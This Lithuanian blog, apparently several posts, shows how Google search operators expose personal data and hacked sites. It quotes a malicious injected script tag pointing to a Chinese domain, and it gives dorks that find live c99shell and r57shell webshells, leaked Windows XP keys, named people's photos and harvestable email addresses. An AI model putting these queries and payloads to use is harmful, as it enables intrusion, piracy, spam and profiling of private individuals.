Šis įrašas bus neįprastai trumpas. Prieš tai rašiau, kaip asmeninius duomenis galima susirankioti su Google. Pati paieškos sistema nėra pajėgi viską tinkamai sukontroliuoti ir tuos duomenis laiku pašalinti iš rezultatų, dėl to Google siūlo galimybę patiems stebėti ką ir kada naujo ji suranda. Tam skirta tarnyba Google Alerts, kurią rasite adresu http://www.google.com/alerts. Tiesiog nurodykite norimą stebėti tekstą (pvz. savo vardą ir pavardę) bei el. paštą ir juo gausite pranešimus iš karto, kai tik Google kur nors suras tai, ką nurodėte. O kai ras, tuomet pasinaudodami šia instrukcija, galite prašyti pašalinti nepageidaujamus rezultatus.

Skaityti visą įrašą…

Na rodos pagaliau baigiau visas savo vasaros atostogas. Viskas buvo gerai, kol neprireikė skristi atgal FlyLAL’u. Išskridau beveik 5 valandom vėliau nei turėjau (visą tą laiką teko praleisti oro uoste), leidomės Kaune, važiavom iki Vilniaus autobusu, o bagažas nuskrido kitu lėktuvu ir atsirado tik kitą dieną po pietų. Vietoj planuotų 7 valandų kelionės namo, ji užtruko visas 14 ir namie buvau tik 5:00, dėl ko sėkmingai buvo iki galo sufakapinta ir visa pirmadieninė darbo diena. Oro uoste priežasčių tiksliai paaiškinti negalėjo, bet kažkodėl vietoj vieno didelio lėktuvo atskrido du maži. Žinoma, FlyLAL’as elgėsi lietuviškai. Neišstenėjo net ir kriu kriu, nors ir buvo didelė didelė kiaulė (tokia rožinė, boingo dydžio). Dabar “džiaugiuosi” galėdamas dirbti visą savaitę po 12 valandų per dieną už praleistą pirmadienį (planas buvo po 10). Šiandien vakarop (naktį?) jau sugebėjau žvilgtelėti ir kas čia įdomaus aplinkui vyksta. Užkliuvo mokyklų elektroninio dienyno istorija. Šiaip viskas įvykdyta pakankamai neetiškai, nes pažeidžiamumas su detaliomis instrukcijomis paskelbtas viešai prieš tai neinformavus sistemos kūrėjų ir jo nepašalinus. Viso pažeidžiamumo akcentas buvo ne galimybė moksleiviams pasiredaguoti pažymius ar pastabas, bet galimybė pavogti asmeninius duomenis. Tad šį kartą norėčiau grįžti prie šios temos ir eilinį kartą panagrinėti tuos atvejus, kai asmeniniai duomenys paviešinami dėl žmonių, o ne sistemų klaidų. Beveik prieš metus rašiau apie būdą, kaip Google pagalba internete ieškoti asmens kodų.

Apie Google galimybes formuojant paieškos užklausas taip pat jau šiek tiek rašiau anksčiau įraše apie WebShell’us. Panašiu principu Google galima išnaudoti ir asmenų paieškai internete. Pavyzdžiui, paieškokim asmenų sąrašų, nurodydami Google sistemai ieškoti žodžių “vardas pavardė” ir paiškos rezultatus apribodami tik iki Excel failų iš Lietuvos. Gaunasi štai tokia nesudėtinga užklausa: http://www.google.lt/search?hl=lt&q=vardas+pavard%EB+filetype%3Axls&meta=cr%3DcountryLT. Karatistai iš karto išsiveržia į priekį, iš paskos keliauja ir kitų sportininkų sąrašai.

Kiekvienam tokiam rastam faile duomenų gali būti labai įvairių. Nuo užimtos vietos varžybose iki pažymių vidurkio skaičiavimo mokykloje ar gimimo datos ir gyvenamos vietos. Galima rasti ir pranešimus SODRAI apie priėmimą į darbą su visais asmeniniais duomenimis, vairuojamus automobilius bei jų valstybinius numerius ir t.t. Ieškoti, žinoma, galima įvairiai. Ko ir kiek surasite priklauso tik nuo Jūsų pačių formuojamų užklausų ir to, ką suindeksavusi turi Google sistema.

Na žmonių sąrašus gauti jau galime. Galime netgi pasiskaityti apie juos daugiau į tą patį Google suvedę žmogaus vardą ir pavardę. Bet sutikit, juk kartais taip knieti pasižiūrėti kaip atrodo vienas ar kitas žmogus. Na pvz., kai maloniai telefonu su kuo nors nepažįstamu pabendrauji ir susitari dėl susitikimo. Juk į jį daug geriau eiti, kai žinai kaip tas žmogus atrodo ir žinai ko nuėjus ieškoti. Kažkaip ramiau tuomet. Ir štai čia į pagalbą ateina jau ne tik Google, bet ir socialiniai tinklai. Vienas iš tokių tinklų, kuriame žmonės nesivaržydami deda savo nuotraukas ir tikrus vardus bei pavardes, yra klase.lt. Nors pats tinklalapis asmenų paieškos neturi, tačiau ir čia galima išnaudoti Google paiešką. Pavyzdžiui, man visuomet knietėjo sužinoti ar iš tiesų yra Lietuvoje Jonas Jonaitis bei kaip jis atrodo. Tam per Google reikia suformuoti tokią užklausą: http://www.google.lt/search?hl=lt&q=Jonas+Jonaitis+site%3Aklase.lt. Joje rezultatai paimami tik iš klase.lt portalo. O jame Jonų Jonaičių ne tiek ir mažai.

Jis iš tiesų egzistuoja, bet tikrasis yra tik vienas, 1988 metais baigęs 12b klasę Vilniaus Antakalnio (18-oji) vidurinėje mokykloje. Galima netgi pamatyti ir kaip jis atrodo.

Ir vėl, naudojomės tik Google paieškos sistema, bet sugebėjom pasižiūrėti kaip atrodo žmogus. Jei paliksite duomenis be priežiūros, Google juos būtinai suindeksuos, o kas nors būtinai sugalvos kaip juos susirasti. Pabandykite paieškoti savęs. Kokių duomenų dar trūksta Jūsų pasui pasigaminti? Ar juos jau sudėjote į internetą?

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Tarp laimingųjų pateko ir Susisiekimo ministerija, ir policijos komisariatas, o pažiurėję žemiau rasite ir tinklalapius ministraspirmininkas.lt, bonumpublicum.lt, 5ci.lt, books.lt ir t.t. 5ci tai turbūt kiek puslapių turėjo, tai visus ir nulaužė. Tačiau nei vienas nesugebėjo net tyliai pasakyti ką nors panašaus į “Mieli mūsų tinklalapio lankytojai, nepykit, kad užkrėtėm Jus žalingom programom po Kinijos įsilaužėlių atakos. Nuo žalingų programų galite pasitikrinti taip ir va kaip. O mes prisipažįstame klydę ir kad tai daugiau nepasikartotų darysime taip ir va kaip.” ar kažkaip kitaip įspėti bei atsiprašyti savo lankytojų. O kur atsakomybė prieš kitus? Ypač iš valstybinių įstaigų? Na taip, juk geriau viską susitvarkyti tyliai, gal niekas nieko nepastebės. Bet google’as viską mato. Ir mes irgi matom. O dabar dar turim progą apie tai ir pakalbėti garsiai, ir dar per dantį patraukti…

Kiek daugiau nei prieš savaitę Antanas su manimi pasidalino savo radiniu internete. Jei tau nuo nešiojamo kompo dugno nusitrynė, tu jį pametei arba tiesiog niekada neturėjai Windows XP registracijos numerio, tai diegiant šią sistemą tokį numerį gauti nėra problema. Ne, nereikia jokių specializuotų paieškos sistemų, tokių kaip astalavista.box.sk ir nereikia žinoti visokių slaptų viečikių internete, nes tą darbą gali padaryti Google. Tiesiog įvykdyk paiešką su tokiais duomenimis:“Windows XP Professional” “Belarc Advisor Current Profile” key: Ar jau radai tinkamą raktą savo piratinei windozės versijai?

Google. Senai apie jį rašiau. Daugelis turbūt naudojatės paprasčiausia paieška be jokių specialių operatorių. O jų Google turi nemažai ir naudojantis jais galima visai neblogai “patobulinti” paiėšką. Pvz. operatorius “intitle:”. Jei paieškoje panaudosi tokį operatorių, tai paieškos rezultatas bus puslapiai, kurių pavadinime yra nurodytas žodis. Dedu iliustracijas su pavyzdžiu.

Panašiai yra ir su operatoriumi “inurl:”. Tik šiuo atveju rezultatas bus puslapiai, kurių adrese bus nurodytas žodis. Pvz.:

Dabar reikėtų prisiminti mano paskutinį įrašą apie WebShell’us ir panaudoti šiuos Google operatorius jų paieškai. Jei paimtumėm C99Shell WebShell’ą, tai matytumėte, kad jo puslapio pavadinimas turi žodį “c99shell” arba “phpshell”. Rašom tai į google užklausą su operatorium “intitle:”, dar pridedam kitą operatorių “filetype:”, kuris leidžia paieškos rezultataus susiaurinti iki tam tikro tipo failų ir štai ką turim.

O gi turim nulaužtų web serverių krūvą į kuriuos jau yra įdiegti WebShell’ai. Kai kurie jų bus atstatyti, todėl kaip viskas atrodė galit pamatyti spausdami “Google kopija”, bet tikrai rasite ir vis dar aktyvių. Su tokiais žiūrėkit neprisižaiskit bemaigydami, nes apkaltins po to jus viso puslapio nulaužimu. O kaip viskas atrodytų, jei rezultatus susiaurintumėm iki Lietuvos?

Na va, kad jie buvo 2007 m. gruodį nulaužti, tai neužfiksavo niekas. Tik adminai ir Google’as. :)Dabar padarom tą patį pvz. su “r57shell”, tik naudokim operatorių “inurl:”. Turim puslapių iš Lietuvos ir čia.

Galit nieko nesigaudyti IT sistemų saugume, bet jei į Google mokėsit tinkamai suvesti paieškos parametrus, tai ir be tų žinių galit “prisidirbti” už kokio nors psulapio defeisą.Tiesa, kažkada pirmame bardakėlyje rašiau apie tai, kaip asterisk atstatė Baltų lankų knygyno puslapį www.blk.lt po turkų nulaužimo. Tuomet puslapyje irgi buvo paliktas WebShell’as, kurį suradus ir buvo padarytas atstatymas. Turkai puslapį nulaužė 2007 m. pačioje lapkričio pradžioje. Nors apie paliktą WebShell’ą knygynas informuotas buvo, bet pas juos jis dar prabuvo iki 2008 m. sausio. Per tą laiką to WebShell’o pagalba su jų puslapiu buvo galima daryti ką nori: žiūrėti prisijungimo prie duomenų bazės duomenis, vykdyti komandas serveryje, keisti patį puslapį ir t.t. Žodžiu, išsidirbinėti su puslapiu ir jo duomenimis kaip nori. O tam, kad paliktas WebShell’as būtų panaikintas, t.y. tiesiog ištrintas vienas failas serveryje, prireikė “tik” trijų mėnesių. Visai neblogas reakcijos laikas.

Ok, kadangi mano paskutinį post’ą sudirbote kaip “dar vieną apie kurį rašė kiti”, tai dabar parašysiu tokį, kokio tikiuosi dar nerašė niekas apie google ir “nestandartinį” jo panaudojimą. Kaip spam’eriai surenka el. pašto adresus turbūt žinote. Jie sukuria spec. programą, taip vadinamą vorą, kuris vaikšto po tinklalapius ir ieško juose el. pašto adresų. Žodžiu, jei palikai kur nors savo email’ą, tai lauk spam’o. Bet kam vargti su tai robotais-voriukais jeigu yra google? Nors ši paieškos sistema ir naudoja filtrus, neleidžiančius ieškoti el. pašto adresų, tačiau juos nesunku apeiti. Pvz., norint gauti one.lt el. pašto adresus, į paieškos laukelį tereikia įrašyti +*@one.lt. Pakaktų ir tiesiog *@one.lt, tačiau pirmuoju variantu kiek tikslesni rezultatai gaunasi. Ir štai ką gaunam:

O jeigu dar žinant kaip naudotis Google API, tai iš tų e-mailų galima automatiniu būdu ir sąrašus sudarinėti. Net neabejoju, kad šia google “galimybe ir funkcija” spameriai sėkmingai jau naudojasi.